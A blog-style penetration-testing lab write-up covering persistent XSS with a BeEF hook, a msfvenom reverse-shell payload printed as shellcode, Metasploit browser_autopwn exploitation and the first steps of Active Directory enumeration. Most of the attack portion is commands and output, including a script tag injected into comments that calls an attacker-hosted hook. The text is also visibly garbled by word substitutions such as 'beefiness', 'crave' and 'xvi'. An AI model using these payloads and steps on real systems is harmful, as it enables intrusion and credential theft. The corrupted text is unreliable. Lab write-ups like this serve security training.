Beef Kernel_require.rb:59:in `require': Cannot Load Such File-- Hitimes/hitimes (Loaderror)
This was definitely one interesting lab. It spans Web exploitation via persistent XSS, basic Active Directory pentesting, token impersonation. To complicate matters, only also for learning, I tried to avoid Metasploit where possible and was able to limit use of Metasploit to just the initial instance of exploiting the target computer to get a shell. Yes I know that itself is quite a big step, only the lab isn't a typical CTF scenario where the aim to get a user beat then escalate to SYSTEM locally. There's AD involved and by definition domain users/admins.
Rather, the aim is to get a (domain) user shell, exploit outdated Active Directory configuration in the domain controller to find credentials, use that to get a local admin user account, then either get a domain business relationship or escalate to SYSTEM to dump the stored token credentials, and so use those to login to the DC.
We start out with just an IP address to check: 172.16.111.1
Our IP is 172.16.111.xxx
Outset the nmap scan, with the vuln scan included.
root@Kali:~/PTP/5.three XSS/Lab 27# nmap -northward -Pn -sV 172.16.111.1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 22:06 +08 Nmap scan written report for 172.16.111.one Host is upward (0.22s latency). Not shown: 999 filtered ports PORT State SERVICE VERSION 80/tcp open http Apache httpd ii.2.22 ((Debian)) MAC Address: 00:50:56:A1:DD:A8 (VMware)
From the above, we see a Spider web server. Loading it gives us this
Scrolling down we see a comment section. Might it be vulnerable to persistent XSS? We can try and see. To do this, burn upwards beef. If you don't have it install it. Kali has it past default but mine was somehow corrupted.
root@Kali:/usr/share/beef-xss# ./beef Traceback (most recent call last): 9: from ./beef:44:in `main' viii: from /usr/lib/cherry-red/two.five.0/rubygems/core_ext/kernel_require.rb:59:in `crave' 7: from /usr/lib/ruby/two.5.0/rubygems/core_ext/kernel_require.rb:59:in `crave' half dozen: from /usr/share/beef-xss/core/loader.rb:14:in `' 5: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `crave' 4: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require' iii: from /usr/lib/ruby/vendor_ruby/msgpack.rb:8:in `' 2: from /usr/lib/ruby/vendor_ruby/msgpack.rb:eleven:in `rescue in ' 1: from /usr/lib/ruby/ii.5.0/rubygems/core_ext/kernel_require.rb:59:in `require' /usr/lib/crimson/2.v.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- msgpack/msgpack (LoadError)
Even apt install beef-xss didn't work. I spent a lot of time troubleshooting, getting errors like these
Installing do_sqlite3 0.10.17 with native extensions Gem::Ext::BuildError: ERROR: Failed to build jewel native extension.
Until what worked was to git clone the official repo, and so run ./install You'll see this nice ASCII art loader
root@Kali:~/Tools/beef# ./install .O, lkOl od cOc 'X, cOo. cX, ,dkc. ;Kd. ,odo,. .dXl . .:xkl' 'OKc .;c' ,oOk: ,kKo. .cOkc. .lOk:. .dXx. :KWKo. 'dXd. .oXx. cXWW0c..dXd. oW0 .OWWWNd.'KK. ....,;lkNWx KWWWWX:'XK. ,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0 od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx :O ;G; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK. 'Ten .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd. .North. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l. 0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:. sixty.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo. 0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW: .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. 'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX' :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk. .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk' OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl. ,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,. .N0 lOXNX0x; .KWWWWWWWWWWWNkc. :NO, 'lXWWWWWWWWWNk:. .dXN0OkxkO0NWWWWWWWWWWKl. .';o0WWWWWWWWWWWNk; .cxOKXKKOd;. #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -- [ BeEF Installer ] -- #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
When done, before running beef edit the config.yaml file in the same directory equally beefiness to set up the default port for XSS payload URLs to port lxxx, and so it omits specifying those (default is 8080 I think)
And before beef allows you start, you have to change the default login credentials for the UI console from
user: "beefiness" passwd: "beef"
to something else. It'due south in the aforementioned YAML file. And so start beef.
root@Kali:~/Tools/beef# ./beefiness [21:thirty:12][*] Browser Exploitation Framework (BeEF) 0.four.7.four-blastoff-pre [21:30:12] | Twit: @beefproject [21:thirty:12] | Site: https://beefproject.com [21:30:12] | Web log: http://blog.beefproject.com [21:xxx:12] |_ Wiki: https://github.com/beefproject/beefiness/wiki [21:30:12][*] Project Creator: Wade Alcorn (@WadeAlcorn) [21:30:12][*] BeEF is loading. Await a few seconds... [21:thirty:xvi][*] 8 extensions enabled: [21:xxx:16] | Network [21:30:16] | Admin UI [21:30:16] | XSSRays [21:30:16] | Social Engineering [21:30:sixteen] | Proxy [21:30:16] | Events [21:30:16] | Requester [21:30:16] |_ Demos [21:30:16][*] 300 modules enabled. [21:30:16][*] iii network interfaces were detected. [21:30:16][*] running on network interface: 127.0.0.1 [21:30:16] | Hook URL: http://127.0.0.1:3000/hook.js [21:30:16] |_ UI URL: http://127.0.0.1:3000/ui/console [21:30:16][*] running on network interface: 192.168.92.134 [21:xxx:16] | Hook URL: http://192.168.92.134:3000/claw.js [21:xxx:sixteen] |_ UI URL: http://192.168.92.134:3000/ui/panel [21:xxx:16][*] running on network interface: 172.xvi.111.30 [21:30:16] | Claw URL: http://172.sixteen.111.30:3000/hook.js [21:xxx:sixteen] |_ UI URL: http://172.16.111.30:3000/ui/panel [21:30:16][*] RESTful API key: d85d81c3482787e169efc4eb382388fc1a914dff [21:30:16][!] [GeoIP] Could non find MaxMind GeoIP database: '/opt/GeoIP/GeoLite2-City.mmdb' [21:xxx:xvi] |_ Run ./update-geoipdb to install [21:30:16][*] HTTP Proxy: http://127.0.0.1:6789 [21:30:16][*] Beefiness server started (press command+c to stop) Copy the Hook URL above, its the link to the XSS payload. Take the one from the same interface as the Web server. Go to the comment page on the Web site and paste it with the Claw URL.
Then visit the beef admin console, login with your creds provided in config.yaml. Later on entering the above I didn't see annihilation. Nothing was hooked except for my own browser since it refreshed the folio. After a while I figured that perhaps the comment API was filtering out the fake image. After all, images aren't supposed to be immune.
It was simply subsequently I dropped the image JS variable and went with a much simpler script. Notation to prevent XSS triggering on WordPress the triangle brackets are replaced with square ones.
Hi all! [script src="http://172.16.111.30/hook.js"] [/script]
This time I got something, beef managed to hook a remote browser.
Information technology's a Windows machine and details show information technology is running x86 Win Server 2008 R2 / 7. Ok and so far so skillful but how do we get our beat? At showtime I tried the Misc -> Raw Javascript injection. I used msfvenom to generate the payloads to get a JS shell
root@Kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=172.xvi.111.30 LPORT=4444 -f js_le -e generic/none [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found ane compatible encoders Attempting to encode payload with ane iterations of generic/none generic/none succeeded with size 324 (iteration=0) generic/none chosen with terminal size 324 Payload size: 324 bytes Final size of js_le file: 972 bytes %ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u685d%u3233%u0000%u7768%u3273%u545f%u4c68%u2677%uff07%ub8d5%u0190%u0000%uc429%u5054%u2968%u6b80%uff00%u50d5%u5050%u4050%u4050%u6850%u0fea%ue0df%ud5ff%u6a97%u6805%u10ac%u1e6f%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%uc085%u0c74%u4eff%u7508%u68ec%ub5f0%u56a2%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff
And so I pasted this payload into the box.
But goose egg happened at my end later setting upward the listener. Afterwards trivial around with the other commands on beef I came across Browser -> Hooked Domain -> Redirect Browser. Hmm interesting, this means I can put a URL at that place and the victim's browser gets redirected to that?
Now because we don't know what vulnerabilities the victim's browser might take I opted to use the browser_autopwn module in msf. What it does it spawns a URL for the victim to visit. This URL leads to 20+ other pages, each with a different Web exploit loaded with meterpreter payload. Notation that this is a very noisy attack vector and generally discouraged.
I used these settings:
msf5 auxiliary(server/browser_autopwn) > options Module options (auxiliary/server/browser_autopwn): Proper noun Electric current Setting Required Clarification ---- --------------- -------- ----------- LHOST 172.16.111.30 yep The IP accost to use for reverse-connect payloads SRVHOST 172.16.111.30 yes The local host to listen on. This must be an address on the local car or 0.0.0.0 SRVPORT 8080 yep The local port to heed on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to advisable exploits
Now exploit it
msf5 auxiliary(server/browser_autopwn) > exploit [*] Auxiliary module running every bit groundwork task 0. [*] Setup msf5 auxiliary(server/browser_autopwn) > [*] Starting exploit modules on host 172.16.111.30... [*] --- [*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/bKuK [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://172.16.111.30:8080/MpnIqqp [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://172.16.111.30:8080/SNxpDLP [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://172.sixteen.111.thirty:8080/VUwLWRYpew [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/wZTLR [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://172.xvi.111.thirty:8080/mgThGUbDCE [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload coffee/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.thirty:8080/iVQnKNAyDsqC [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/dbySJjDuOJke [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload coffee/meterpreter/reverse_tcp [*] Using URL: http://172.xvi.111.30:8080/xjBUwIOgk [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://172.16.111.30:8080/NGdcuOY [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/eiKX [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/tguWbqbYltUB [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.30:8080/UDMMBMzdHL [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.xxx:8080/MFUCKQpi [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.xvi.111.thirty:8080/DEbNhnJrjP [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.xxx:8080/mDPl [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.xvi.111.thirty:8080/gOZphDCTmIB [*] Server started. [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://172.16.111.xxx:8080/pRXQi [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started opposite TCP handler on 172.xvi.111.30:3333 [*] Using URL: http://172.16.111.thirty:8080/eghbkObV [*] Server started. [*] Using URL: http://172.16.111.30:8080/pHGel [*] Server started. [*] Starting handler for coffee/meterpreter/reverse_tcp on port 7777 [*] Started opposite TCP handler on 172.16.111.30:6666 [*] Started reverse TCP handler on 172.16.111.30:7777 [*] --- Done, establish 20 exploit modules [*] Using URL: http://172.16.111.30:8080/X7mSojl [*] Server started. Now feed the above URL via the Redirect Browser control.
You'll encounter a bunch of exploits spring to life
[*] Handling '/X7mSojl' [*] Treatment '/X7mSojl?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d' [*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0: [*] Responding with 13 exploits [*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Blazon Violation Vulnerability [*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes). [*] 172.16.111.1 java_jre17_jmxbean - treatment request for /mgThGUbDCE [*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes). [*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/ [*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE [*] 172.sixteen.111.one java_jre17_reflection_types - handling request for /dbySJjDuOJke [*] 172.16.111.i java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 172.16.111.one java_atomicreferencearray - Generated jar to driblet (5310 bytes). [*] 172.16.111.i java_jre17_jmxbean - handling request for /mgThGUbDCE/ [*] 172.sixteen.111.1 java_jre17_reflection_types - treatment asking for /dbySJjDuOJke/ [*] 172.16.111.one java_jre17_jmxbean - handling asking for /mgThGUbDCE [*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke [*] 172.xvi.111.i java_atomicreferencearray - Sending Coffee AtomicReferenceArray Type Violation Vulnerability [*] 172.16.111.one java_atomicreferencearray - Generated jar to driblet (5310 bytes). [*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/ [*] 172.sixteen.111.ane java_jre17_jmxbean - handling request for /mgThGUbDCE/ [*] 172.xvi.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution treatment request [*] 172.sixteen.111.1 java_jre17_reflection_types - treatment request for /dbySJjDuOJke/onJQGHPo.jar [*] 172.sixteen.111.1 java_atomicreferencearray - Sending jar [*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/xBxeIbgz.jar [*] 172.sixteen.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/onJQGHPo.jar [*] 172.sixteen.111.i java_atomicreferencearray - Sending jar [*] 172.xvi.111.one java_jre17_jmxbean - handling request for /mgThGUbDCE/xBxeIbgz.jar [*] 172.16.111.1 java_jre17_jmxbean - treatment asking for /mgThGUbDCE [*] 172.16.111.ane java_jre17_reflection_types - treatment asking for /dbySJjDuOJke [*] 172.16.111.ane java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 172.sixteen.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes). [*] 172.16.111.one java_jre17_reflection_types - handling request for /dbySJjDuOJke/ [*] 172.xvi.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/ [*] 172.sixteen.111.one java_rhino - Java Applet Rhino Script Engine Remote Lawmaking Execution handling request [*] 172.16.111.1 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 172.16.111.one java_verifier_field_access - Generated jar to driblet (5310 bytes). [*] 172.16.111.i java_rhino - Sending Applet.jar [*] 172.16.111.one java_jre17_reflection_types - handling request for /dbySJjDuOJke/dPcuYLAe.jar [*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/RVblRPsx.jar [*] 172.sixteen.111.1 java_atomicreferencearray - Sending jar [*] 172.16.111.one java_jre17_jmxbean - handling request for /mgThGUbDCE/RVblRPsx.jar [*] 172.16.111.1 java_rhino - Sending Applet.jar [*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/dPcuYLAe.jar [*] 172.xvi.111.1 java_atomicreferencearray - Sending jar [*] Sending stage (53844 bytes) to 172.sixteen.111.one [*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE [*] 172.16.111.1 java_jre17_reflection_types - handling asking for /dbySJjDuOJke [*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC [*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 172.sixteen.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes). [*] 172.xvi.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/ [*] 172.16.111.1 java_jre17_reflection_types - treatment request for /dbySJjDuOJke/ [*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution treatment asking [*] 172.16.111.1 java_verifier_field_access - Sending Coffee Applet Field Bytecode Verifier Cache Remote Code Execution [*] 172.xvi.111.1 java_verifier_field_access - Generated jar to drop (5310 bytes). [*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC/ [*] 172.16.111.i java_jre17_reflection_types - handling request for /dbySJjDuOJke/DLUOvQci.jar [*] 172.xvi.111.i java_rhino - Sending Applet.jar [*] 172.sixteen.111.1 java_atomicreferencearray - Sending jar [*] 172.16.111.1 java_jre17_jmxbean - treatment request for /mgThGUbDCE/hqtInWiz.jar [*] 172.16.111.ane java_verifier_field_access - Sending jar [*] 172.xvi.111.1 java_jre17_provider_skeleton - treatment request for /iVQnKNAyDsqC/QkFXulv.jar [*] 172.16.111.one java_jre17_reflection_types - handling asking for /dbySJjDuOJke/DLUOvQci.jar [*] 172.xvi.111.i java_atomicreferencearray - Sending jar [*] 172.16.111.1 java_jre17_jmxbean - handling asking for /mgThGUbDCE/hqtInWiz.jar [*] 172.16.111.ane java_verifier_field_access - Sending jar [*] 172.xvi.111.i java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC/QkFXulv.jar [*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 172.sixteen.111.ane java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 172.16.111.ane java_rhino - Java Applet Rhino Script Engine Remote Code Execution treatment request [*] 172.16.111.one java_rhino - Coffee Applet Rhino Script Engine Remote Code Execution treatment request [*] Meterpreter session i opened (172.16.111.30:7777 -> 172.xvi.111.1:49332) at 2019-05-26 23:36:xv +0800 [*] Sending phase (53844 bytes) to 172.16.111.1 [*] Meterpreter session 2 opened (172.16.111.xxx:7777 -> 172.16.111.ane:62351) at 2019-05-26 23:36:thirty +0800 [*] Sending phase (53844 bytes) to 172.16.111.1 [*] Session ID 1 (172.16.111.30:7777 -> 172.sixteen.111.1:49332) processing InitialAutoRunScript 'migrate -f' [!] Meterpreter scripts are deprecated. Attempt post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...] [-] Could not execute migrate: Male monarch::Postal service::Meterpreter::RequestError stdapi_sys_process_attach: Operation failed: 1 [*] Meterpreter session 3 opened (172.16.111.30:7777 -> 172.sixteen.111.i:24873) at 2019-05-26 23:36:46 +0800 [*] Sending stage (53844 bytes) to 172.16.111.one [*] Session ID 2 (172.xvi.111.30:7777 -> 172.sixteen.111.1:62351) processing InitialAutoRunScript 'drift -f' [!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...]
The full chore list spawned by the above
msf5 auxiliary(server/browser_autopwn) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Auxiliary: server/browser_autopwn 1 Exploit: android/browser/webview_addjavascriptinterface android/meterpreter/reverse_tcp tcp://172.16.111.30:8888 ii Exploit: multi/browser/firefox_proto_crmfrequest generic/shell_reverse_tcp tcp://172.xvi.111.30:6666 3 Exploit: multi/browser/firefox_tostring_console_injection generic/shell_reverse_tcp tcp://172.16.111.30:6666 4 Exploit: multi/browser/firefox_webidl_injection generic/shell_reverse_tcp tcp://172.sixteen.111.30:6666 5 Exploit: multi/browser/java_atomicreferencearray coffee/meterpreter/reverse_tcp tcp://172.sixteen.111.30:7777 half dozen Exploit: multi/browser/java_jre17_jmxbean java/meterpreter/reverse_tcp tcp://172.16.111.30:7777 7 Exploit: multi/browser/java_jre17_provider_skeleton java/meterpreter/reverse_tcp tcp://172.16.111.xxx:7777 viii Exploit: multi/browser/java_jre17_reflection_types java/meterpreter/reverse_tcp tcp://172.xvi.111.30:7777 9 Exploit: multi/browser/java_rhino java/meterpreter/reverse_tcp tcp://172.xvi.111.30:7777 10 Exploit: multi/browser/java_verifier_field_access java/meterpreter/reverse_tcp tcp://172.xvi.111.30:7777 11 Exploit: multi/browser/opera_configoverwrite generic/shell_reverse_tcp tcp://172.sixteen.111.xxx:6666 12 Exploit: windows/browser/adobe_flash_mp4_cprt windows/meterpreter/reverse_tcp tcp://172.xvi.111.30:3333 xiii Exploit: windows/browser/adobe_flash_rtmp windows/meterpreter/reverse_tcp tcp://172.16.111.xxx:3333 14 Exploit: windows/browser/ie_cgenericelement_uaf windows/meterpreter/reverse_tcp tcp://172.16.111.30:3333 xv Exploit: windows/browser/ie_createobject windows/meterpreter/reverse_tcp tcp://172.16.111.xxx:3333 sixteen Exploit: windows/browser/ie_execcommand_uaf windows/meterpreter/reverse_tcp tcp://172.16.111.30:3333 17 Exploit: windows/browser/mozilla_nstreerange windows/meterpreter/reverse_tcp tcp://172.sixteen.111.30:3333 eighteen Exploit: windows/browser/ms13_080_cdisplaypointer windows/meterpreter/reverse_tcp tcp://172.16.111.30:3333 19 Exploit: windows/browser/ms13_090_cardspacesigninhelper windows/meterpreter/reverse_tcp tcp://172.16.111.thirty:3333 20 Exploit: windows/browser/msxml_get_definition_code_exec windows/meterpreter/reverse_tcp tcp://172.16.111.30:3333 21 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://172.16.111.30:3333 22 Exploit: multi/handler generic/shell_reverse_tcp tcp://172.xvi.111.30:6666 23 Exploit: multi/handler java/meterpreter/reverse_tcp tcp://172.16.111.30:7777
At this betoken I got 4 meterpreter sessions, though more would spring up later.
msf5 auxiliary(server/browser_autopwn) > sessions Active sessions =============== Id Name Type Information Connectedness -- ---- ---- ----------- ---------- 1 meterpreter java/windows SecondUser @ PCCLIENT7 172.xvi.111.30:7777 -> 172.sixteen.111.1:49332 (172.sixteen.111.1) 2 meterpreter java/windows SecondUser @ PCCLIENT7 172.16.111.30:7777 -> 172.16.111.ane:62351 (172.sixteen.111.1) 3 meterpreter java/coffee 172.16.111.30:7777 -> 172.16.111.1:24873 (172.16.111.one) iv meterpreter java/java 172.16.111.xxx:7777 -> 172.16.111.1:33893 (172.16.111.1)
Not wanting to rely on Meterpreter further I dropped a shell to explore.
meterpreter > shell Procedure i created. Channel 1 created. Microsoft Windows [Version 6.i.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\SecondUser\Desktop>whoami && ipconfig /all whoami && ipconfig /all examplead\seconduser Windows IP Configuration Host Name . . . . . . . . . . . . : PCCLIENT7 Master Dns Suffix . . . . . . . : examplead.lan Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : examplead.lan Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-A1-96-E2 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::95f0:8ae:46f0:ca5a%11(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.200.210(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.200.i DHCPv6 IAID . . . . . . . . . . . : 234901590 DHCPv6 Customer DUID. . . . . . . . : 00-01-00-01-24-76-AC-A0-00-fifty-56-A1-96-E2 DNS Servers . . . . . . . . . . . : 192.168.200.100 NetBIOS over Tcpip. . . . . . . . : Enabled Tunnel adapter isatap.{33C07500-DFFE-4075-B5C5-5A63EA189D50}: Media Country . . . . . . . . . . . : Media asunder Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter Physical Accost. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Aye Ok let'southward bank check out the local user accounts.
C:\Users\SecondUser\Desktop>net user net user User accounts for \\PCCLIENT7 ------------------------------------------------------------------------------- Ambassador Guest LADM The command completed successfully. C:\Users\SecondUser\Desktop>internet localgroup net localgroup Aliases for \\PCCLIENT7 ------------------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users *Event Log Readers *Guests *IIS_IUSRS *Network Configuration Operators *Functioning Log Users *Performance Monitor Users *Power Users *Remote Desktop Users *Replicator *Users The command completed successfully. C:\Users\SecondUser\Desktop>internet localgroup Administrators net localgroup Administrators Alias proper noun Administrators Annotate Members ------------------------------------------------------------------------------- Ambassador EXAMPLEAD\Domain Admins LADM The control completed successfully.
Wait that'southward odd we didn't encounter our user SecondUser. What does this mean? Just if bank check against the list of domain users its in that location.
C:\Users\SecondUser\Desktop>net user /domain net user /domain The request will exist processed at a domain controller for domain examplead.lan. User accounts for \\DC01.examplead.lan ------------------------------------------------------------------------------- Ambassador exampleadm ExampleUser Guest krbtgt SecondUser The command completed successfully.
That ways the current user doesn't even exist on the local motorcar merely is a domain user. Nosotros tin can confirm this
C:\Users\SecondUser\Desktop>net user seconduser /domain internet user seconduser /domain The request will be processed at a domain controller for domain examplead.lan. User name SecondUser Full Name Second User Comment User's annotate Country lawmaking 000 (System Default) Account active Yes Account expires Never Password last gear up vii/17/2014 6:01:58 AM Countersign expires Never Password changeable seven/18/2014 6:01:58 AM Password required Yep User may change password Yeah Workstations allowed All Logon script User profile Home directory Last logon six/i/2019 3:06:30 AM Logon hours immune All Local Group Memberships Global Group memberships *Instance Group *Domain Users The command completed successfully.
So the domain controller is at dc01.examplead.lan. We can ping it.
C:\Users\SecondUser\Desktop>ping dc01.examplead.lan ping dc01.examplead.lan Pinging DC01.examplead.lan [192.168.200.100] with 32 bytes of data: Reply from 192.168.200.100: bytes=32 time=6ms TTL=128 Reply from 192.168.200.100: bytes=32 time<1ms TTL=128 Reply from 192.168.200.100: bytes=32 fourth dimension<1ms TTL=128 Answer from 192.168.200.100: bytes=32 time<1ms TTL=128 Ping statistics for 192.168.200.100: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 6ms, Average = 1ms
Equally expected the DC is the same equally the DNS server the local machine indicated. At present let's check what other machines are running on the same subnet as our compromised host. We can practise this via nmap afterwards configuring the compromised host as a proxy to frontward the nmap scans. But that usually takes too long. Nosotros will set up the proxy forwarder on the machine eventually but for now let's do a uncomplicated arp browse using the simple arp-scan tool we used previously.
